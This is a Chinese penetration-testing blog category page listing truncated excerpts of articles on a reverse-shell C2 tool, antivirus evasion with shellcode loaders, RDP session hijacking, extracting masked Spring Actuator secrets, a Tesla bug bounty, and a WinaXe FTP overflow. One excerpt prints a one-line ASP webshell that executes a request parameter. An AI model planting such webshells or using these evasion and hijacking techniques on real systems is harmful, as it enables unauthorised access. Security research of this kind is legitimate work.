分类 渗透测试 下的文章

0x00 背景晚上一位群大佬分享了一款功能强大的反弹shell工具:ReverseTCPShell C2,说是能bypass,正好最近也在研究免杀,就针对这个工具做了简单的实验测试。工具下载地址:PowerShell ReverseTCP Shell - Framework. Contribute to ZHacker13/ReverseTCPShell development by.......

0x00 前言最近一直在研究 bypass 杀软这块,测试了流行的各种语言的 shellcode 加载器,想了解下各种语言下的实现原理。但是回过头来一想,shellcode 不也是代码吗?为什么一定要通过执行机器码上线呢?只要能够建立 TCP 等各种通道的连接,各种语言的代码不也能实现嘛?要解决的只是是否能在 Windows 平台下运行(可执行文件)。于是这里就想到了 MSF 下可以.......

0x00 前言系统管理员和用户通常可以通过 RDP(远程桌面)协议登录指定服务器,而攻击者可以通过可以特权提升至 SYSTEM 权限的用户,可以在不知道其他用户登录凭据的情况下,用来劫持其他用户的 RDP 会话。0x01 利用条件需要管理员本地组成员攻击 ID是Administrators不适用0x02 过程当已经获取了本地管理组的用户权限,可以尝试提到 SYSTEM 权限,并在命令.......

一. 前言访问 /env 接口时,spring actuator 会将一些带有敏感关键词 (如 password、secret) 的属性名对应的属性值用 号替换,以达到脱敏的效果。在目标既不出网,/jolokia 接口又没有合适的 MBean 或者不支持 POST 请求的情况下,很多获取被星号脱敏的密码的明文的方法就失效了。这时候就可以利用 Eclipse Memory Analy.......

本文讲述作者通过Github探测手段(GithubRecon)发现了特斯拉某服务端的用户名密码凭据,通过该凭据可以成功对特斯拉后台API接口发起请求,实现敏感数据返回。漏洞最终获得了特斯拉官方$5000美金奖励。一起来围观围观。漏洞发现由于我对服务台和管理员角色比较熟悉,但此前并未涉猎过多的网络安全,对于安全行业,我还在努力研究。最近几天,我在看@Th3G3nt3lman发布的Git.......

零:路由和版本0x01:路由知识Spring Boot 1.x 版本默认内置路由的根路径以 / 开始,2.x 则统一以 /actuator 开始有些程序员会自定义 /manage、/management 或 项目相关名称 为根路径默认内置路由名字,如 /env 有时候也会被程序员修改,如修改成 /appenv0x02:版本知识Spring Cloud 是基于 Spring Boot.......

漏洞说明WinaXe是Windows下一个综合管理工具,有很多管理小工具,其中FTP管理工具在连接FTP服务器的时候,如果通过构造一个特殊的FTP Server,当WinaXe FTP连接的时候,返回一个畸形数据包,会导致WinaXe栈溢出,导致返回地址被覆盖,从而引发代码执行,下面对此漏洞进行详细分析。软件下载:https://www.exploit-db.com/apps/14a.......

今天无意看到一个asp的shell是这样的,09转ascii肯定是不可显示的字符。那应该如何用菜刀连接?<% heheda=Request(Chr(35)&chr(37)&chr(09)) execute heheda %> 0x01. 原理思路其实很简单,由于菜刀的密码框里肯定不能输入不可显示的字符,那么我们将这些字符用%写到我们的脚本上,再POST到t.......

0x1. windowswindows上的文件名长度和文件路径有关具体关系为:从根目录计算,文件路径长度最长为259个bytes。有一个特殊情况,D:xx.txt,类似这样根目录下面一个文件,最后该文件路径长度最长为258个bytes,其他都是259个bytes这也是为什么msdn定义#define MAX_PATH 260的原因,第260个字符为字符串结尾的0具体操作可以在任意一个.......

目录:查找隐藏文件如何设置隐藏attrib命令0x01.查找隐藏文件dir /ah /ah表示all hidden,只显示所有隐藏的文件和目录。dir /a 显示所有文件和目录,包括隐藏文件。attrib设置文件夹选项为:可以查看隐藏文件0x02. 如何设置隐藏只需要用windows上attrib命令attrib +h xx.file 设置文件隐藏属性(hide)attrib -h .......